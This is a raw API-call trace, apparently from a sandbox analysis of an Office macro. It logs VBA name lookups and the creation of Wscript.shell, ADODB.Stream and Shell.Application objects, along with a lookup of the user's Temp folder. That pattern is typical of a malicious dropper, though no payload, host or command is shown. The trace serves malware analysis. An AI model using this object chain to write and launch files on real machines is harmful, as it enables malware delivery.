0x13 [0033.027] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_Optio", lHashVal=0x10d0c6, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.027] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.027] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.027] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_Optio", lHashVal=0x10d0c6, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.027] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.027] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.027] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_Optio", lHashVal=0x10d0c6, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.027] IUnknown:Release (This=0x782b300) returned 0x6 [0033.027] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.027] IUnknown:Release (This=0x782a220) returned 0xe [0033.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a608de, cbMultiByte=6, lpWideCharStr=0x2e46c0, cchWideChar=5 | out: lpWideCharStr="nGFX") returned 0 [0033.027] wcscpy_s (in: _Destination=0xb5c7e80, _SizeInWords=0x5, _Source="nGFX" | out: _Destination="nGFX") returned 0x0 [0033.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52fbdc, cbMultiByte=10, lpWideCharStr=0x9d13e0e, cchWideChar=22 | out: lpWideCharStr="selecttrue") returned 10 [0033.027] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x9d20000 [0033.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a608de, cbMultiByte=6, lpWideCharStr=0x2e46c0, cchWideChar=5 | out: lpWideCharStr="nGFX") returned 0 [0033.028] IMalloc:Free (This=0x7fefe015380, pv=0x7846630) [0033.028] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e4490, pDummy=0x0 | out: ppTypeAttr=0x2e4490, pDummy=0x0) returned 0x0 [0033.029] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.029] IMalloc:Free (This=0x7fefe015380, pv=0x7846630) [0033.029] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b23b8, ppTypeAttr=0x2e46d0, pDummy=0x0 | out: ppTypeAttr=0x2e46d0, pDummy=0x0) returned 0x0 [0033.029] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b23b8) returned 0x0 [0033.029] IMalloc:Free (This=0x7fefe015380, pv=0xb5a5f70) [0033.029] SetErrorMode (uMode=0x8001) returned 0x8005 [0033.029] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0033.029] SetErrorMode (uMode=0x8005) returned 0x8005 [0033.030] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x2c8) returned 0x7fee3a5a03c [0033.030] CLSIDFromProgIDEx (in: lpszProgID="Wscript.shell", lpclsid=0x2e6028 | out: lpclsid=0x2e6028*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0033.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0033.034] CoCreateInstance (in: rclsid=0x2e6028*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7fee3a6aa48*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2e5fd8 | out: ppv=0x2e5fd8*=0x860b1b8) returned 0x0 [0033.101] WshShell:IUnknown:QueryInterface (in: This=0x860b1b8, riid=0x7fee3a84590*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x2e5ff0 | out: ppvObject=0x2e5ff0*=0x0) returned 0x80004002 [0033.101] WshShell:IUnknown:QueryInterface (in: This=0x860b1b8, riid=0x7fee3a845a0*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x2e5ff8 | out: ppvObject=0x2e5ff8*=0x0) returned 0x80004002 [0033.101] WshShell:IUnknown:QueryInterface (in: This=0x860b1b8, riid=0x7fee3a6aa68*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2e60b8 | out: ppvObject=0x2e60b8*=0x860b190) returned 0x0 [0033.101] WshShell:IUnknown:Release (This=0x860b1b8) returned 0x1 [0033.101] IUnknown:AddRef (This=0x860b190) returned 0x2 [0033.101] IUnknown:Release (This=0x860b190) returned 0x1 [0033.101] GetUserDefaultLCID () returned 0x409 [0033.101] GetUserDefaultLCID () returned 0x409 [0033.101] SafeArrayCopy (in: psa=0x75dd180, ppsaOut=0x7801638 | out: ppsaOut=0x7801638) returned 0x0 [0033.101] CLSIDFromProgIDEx (in: lpszProgID="Adodb.streaM", lpclsid=0x2e6028 | out: lpclsid=0x2e6028*(Data1=0x566, Data2=0x0, Data3=0x10, Data4=([0]=0x80, [1]=0x0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x6d, [6]=0x2e, [7]=0xa4))) returned 0x0 [0033.105] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0033.105] CoCreateInstance (in: rclsid=0x2e6028*(Data1=0x566, Data2=0x0, Data3=0x10, Data4=([0]=0x80, [1]=0x0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x6d, [6]=0x2e, [7]=0xa4)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7fee3a6aa48*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2e5fd8 | out: ppv=0x2e5fd8*=0xdfc1400) returned 0x0 [0033.200] Stream:IUnknown:QueryInterface (in: This=0xdfc1400, riid=0x7fee3a84590*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x2e5ff0 | out: ppvObject=0x2e5ff0*=0x0) returned 0x80004002 [0033.200] Stream:IUnknown:QueryInterface (in: This=0xdfc1400, riid=0x7fee3a845a0*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x2e5ff8 | out: ppvObject=0x2e5ff8*=0x0) returned 0x80004002 [0033.200] Stream:IUnknown:QueryInterface (in: This=0xdfc1400, riid=0x7fee3a6aa68*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2e60b8 | out: ppvObject=0x2e60b8*=0xdfc1400) returned 0x0 [0033.201] Stream:IUnknown:Release (This=0xdfc1400) returned 0x1 [0033.201] Stream:IUnknown:AddRef (This=0xdfc1400) returned 0x2 [0033.201] Stream:IUnknown:Release (This=0xdfc1400) returned 0x1 [0033.201] CLSIDFromProgIDEx (in: lpszProgID="shell.Application", lpclsid=0x2e6028 | out: lpclsid=0x2e6028*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0 [0033.205] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0033.205] CoCreateInstance (in: rclsid=0x2e6028*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7fee3a6aa48*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2e5fd8 | out: ppv=0x2e5fd8*=0xb5a76b0) returned 0x0 [0033.207] Shell:IUnknown:QueryInterface (in: This=0xb5a76b0, riid=0x7fee3a84590*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x2e5ff0 | out: ppvObject=0x2e5ff0*=0x0) returned 0x80004002 [0033.207] Shell:IUnknown:QueryInterface (in: This=0xb5a76b0, riid=0x7fee3a845a0*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x2e5ff8 | out: ppvObject=0x2e5ff8*=0x0) returned 0x80004002 [0033.207] Shell:IUnknown:QueryInterface (in: This=0xb5a76b0, riid=0x7fee3a6aa68*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2e60b8 | out: ppvObject=0x2e60b8*=0xb5a76b0) returned 0x0 [0033.207] Shell:IUnknown:Release (This=0xb5a76b0) returned 0x1 [0033.207] Shell:IUnknown:AddRef (This=0xb5a76b0) returned 0x2 [0033.207] Shell:IUnknown:Release (This=0xb5a76b0) returned 0x1 [0033.207] IDispatch:GetIDsOfNames (in: This=0x860b190, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x2e61c0*="Environment", cNames=0x1, lcid=0x409, rgDispId=0x2e61a4 | out: rgDispId=0x2e61a4*=200) returned 0x0 [0033.215] IDispatch:Invoke (in: This=0x860b190, dispIdMember=200, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x2e6158*(rgvarg=([0]=0xb404e98*(varType=0x4008, wReserved1=0xb40, wReserved2=0x0, wReserved3=0x0, varVal1=0x77761d0*="Process", varVal2=0x77761d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xb405030, pExcepInfo=0x2e6170, puArgErr=0x2e6150 | out: pDispParams=0x2e6158*(rgvarg=([0]=0xb404e98*(varType=0x4008, wReserved1=0xb40, wReserved2=0x0, wReserved3=0x0, varVal1=0x77761d0*="Process", varVal2=0x77761d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xb405030*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8ca82a0, varVal2=0x75dd180), pExcepInfo=0x2e6170*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x2e6150*=0x409) returned 0x0 [0033.216] IUnknown:AddRef (This=0x8ca82a0) returned 0x2 [0033.216] IUnknown:Release (This=0x8ca82a0) returned 0x1 [0033.216] IDispatch:Invoke (in: This=0x8ca82a0, dispIdMember=0, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x2e62b8*(rgvarg=([0]=0xb405070*(varType=0x4008, wReserved1=0x780, wReserved2=0x0, wReserved3=0x0, varVal1=0x77761e0*="TeMP", varVal2=0x77761e0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xb4050c8, pExcepInfo=0x2e62d0, puArgErr=0x2e62b0 | out: pDispParams=0x2e62b8*(rgvarg=([0]=0xb405070*(varType=0x4008, wReserved1=0x780, wReserved2=0x0, wReserved3=0x0, varVal1=0x77761e0*="TeMP", varVal2=0x77761e0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xb4050c8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp", varVal2=0x7843580), pExcepInfo=0x2e62d0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x2e62b0*=0xb5ce970) returned 0x0 [0033.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BackBuffer") returned 0x102e9b [0033.219] strcpy_s (in: _Dst=0x2e4800, _DstSize=0xb, _Src="BackBuffer" | out: _Dst="BackBuffer") returned 0x0 [0033.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4800, cbMultiByte=11, lpWideCharStr=0x2e4650, cchWideChar=11 | out: lpWideCharStr="BackBuffer") returned 11 [0033.219] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.219] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="BackBuffer", lHashVal=0x102e9b, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.219] IUnknown:Release (This=0x782a220) returned 0xe [0033.219] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.219] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="BackBuffer", lHashVal=0x102e9b, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.219] IUnknown:Release (This=0x731da90) returned 0x15 [0033.219] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.219] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="BackBuffer", lHashVal=0x102e9b, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.219] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.219] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.219] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="BackBuffer", lHashVal=0x102e9b, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.219] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.219] IMalloc:Alloc (This=0x7fefe015380, cb=0x12) returned 0xb4963f0 [0033.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_BackBuffer") returned 0x109d05 [0033.219] strcpy_s (in: _Dst=0x2e49b0, _DstSize=0x12, _Src="_B_var_BackBuffer" | out: _Dst="_B_var_BackBuffer") returned 0x0 [0033.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e49b0, cbMultiByte=18, lpWideCharStr=0x2e4800, cchWideChar=18 | out: lpWideCharStr="_B_var_BackBuffer") returned 18 [0033.219] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.219] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_BackBuffer", lHashVal=0x109d05, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.219] IUnknown:Release (This=0x782a220) returned 0xe [0033.219] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.219] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_BackBuffer", lHashVal=0x109d05, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.219] IUnknown:Release (This=0x731da90) returned 0x15 [0033.219] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.219] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_BackBuffer", lHashVal=0x109d05, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.219] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.219] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.219] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_BackBuffer", lHashVal=0x109d05, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.219] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.219] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.219] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_BackBuffer", lHashVal=0x109d05, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.219] IUnknown:Release (This=0x782b300) returned 0x6 [0033.219] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.219] IUnknown:Release (This=0x782a220) returned 0xe [0033.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a525b6, cbMultiByte=8, lpWideCharStr=0x2e46c0, cchWideChar=7 | out: lpWideCharStr="isLost") returned 0 [0033.219] wcscpy_s (in: _Destination=0xb5c7ec0, _SizeInWords=0x7, _Source="isLost" | out: _Destination="isLost") returned 0x0 [0033.219] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ResX") returned 0x108529 [0033.219] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.219] IUnknown:Release (This=0x782a220) returned 0xe [0033.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ResY") returned 0x101fba [0033.220] strcpy_s (in: _Dst=0x2e4800, _DstSize=0x5, _Src="ResY" | out: _Dst="ResY") returned 0x0 [0033.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4800, cbMultiByte=5, lpWideCharStr=0x2e4650, cchWideChar=5 | out: lpWideCharStr="ResY") returned 5 [0033.220] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.220] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="ResY", lHashVal=0x101fba, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.220] IUnknown:Release (This=0x782a220) returned 0xe [0033.220] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.220] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="ResY", lHashVal=0x101fba, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.220] IUnknown:Release (This=0x731da90) returned 0x15 [0033.220] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.220] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="ResY", lHashVal=0x101fba, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.220] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.220] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.220] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="ResY", lHashVal=0x101fba, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.220] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.220] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0xb4963f0 [0033.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ResY") returned 0x108526 [0033.220] strcpy_s (in: _Dst=0x2e49b0, _DstSize=0xc, _Src="_B_var_ResY" | out: _Dst="_B_var_ResY") returned 0x0 [0033.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e49b0, cbMultiByte=12, lpWideCharStr=0x2e4800, cchWideChar=12 | out: lpWideCharStr="_B_var_ResY") returned 12 [0033.220] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.220] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_ResY", lHashVal=0x108526, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.220] IUnknown:Release (This=0x782a220) returned 0xe [0033.220] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.220] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_ResY", lHashVal=0x108526, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.220] IUnknown:Release (This=0x731da90) returned 0x15 [0033.220] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.220] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_ResY", lHashVal=0x108526, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.220] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.220] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.220] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_ResY", lHashVal=0x108526, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.220] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.220] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.220] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_ResY", lHashVal=0x108526, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.220] IUnknown:Release (This=0x782b300) returned 0x6 [0033.220] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.220] IUnknown:Release (This=0x782a220) returned 0xe [0033.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MeX") returned 0x10b35c [0033.220] strcpy_s (in: _Dst=0x2e4800, _DstSize=0x4, _Src="MeX" | out: _Dst="MeX") returned 0x0 [0033.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4800, cbMultiByte=4, lpWideCharStr=0x2e4650, cchWideChar=4 | out: lpWideCharStr="MeX") returned 4 [0033.220] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.220] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="MeX", lHashVal=0x10b35c, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.220] IUnknown:Release (This=0x782a220) returned 0xe [0033.220] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.220] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="MeX", lHashVal=0x10b35c, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.220] IUnknown:Release (This=0x731da90) returned 0x15 [0033.220] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.221] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="MeX", lHashVal=0x10b35c, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.221] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.221] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.221] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="MeX", lHashVal=0x10b35c, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.221] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.221] IMalloc:Alloc (This=0x7fefe015380, cb=0xb) returned 0xb4963f0 [0033.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MeX") returned 0x10706d [0033.221] strcpy_s (in: _Dst=0x2e49b0, _DstSize=0xb, _Src="_B_var_MeX" | out: _Dst="_B_var_MeX") returned 0x0 [0033.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e49b0, cbMultiByte=11, lpWideCharStr=0x2e4800, cchWideChar=11 | out: lpWideCharStr="_B_var_MeX") returned 11 [0033.221] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.221] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_MeX", lHashVal=0x10706d, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.221] IUnknown:Release (This=0x782a220) returned 0xe [0033.221] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.221] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_MeX", lHashVal=0x10706d, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.221] IUnknown:Release (This=0x731da90) returned 0x15 [0033.221] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.221] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_MeX", lHashVal=0x10706d, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.221] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.221] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.221] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_MeX", lHashVal=0x10706d, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.221] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.221] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.221] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_MeX", lHashVal=0x10706d, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.221] IUnknown:Release (This=0x782b300) returned 0x6 [0033.221] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.221] IUnknown:Release (This=0x782a220) returned 0xe [0033.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MeY") returned 0x10b359 [0033.221] strcpy_s (in: _Dst=0x2e4800, _DstSize=0x4, _Src="MeY" | out: _Dst="MeY") returned 0x0 [0033.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4800, cbMultiByte=4, lpWideCharStr=0x2e4650, cchWideChar=4 | out: lpWideCharStr="MeY") returned 4 [0033.221] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.221] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="MeY", lHashVal=0x10b359, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.221] IUnknown:Release (This=0x782a220) returned 0xe [0033.221] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.221] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="MeY", lHashVal=0x10b359, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.221] IUnknown:Release (This=0x731da90) returned 0x15 [0033.221] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.221] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="MeY", lHashVal=0x10b359, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.221] 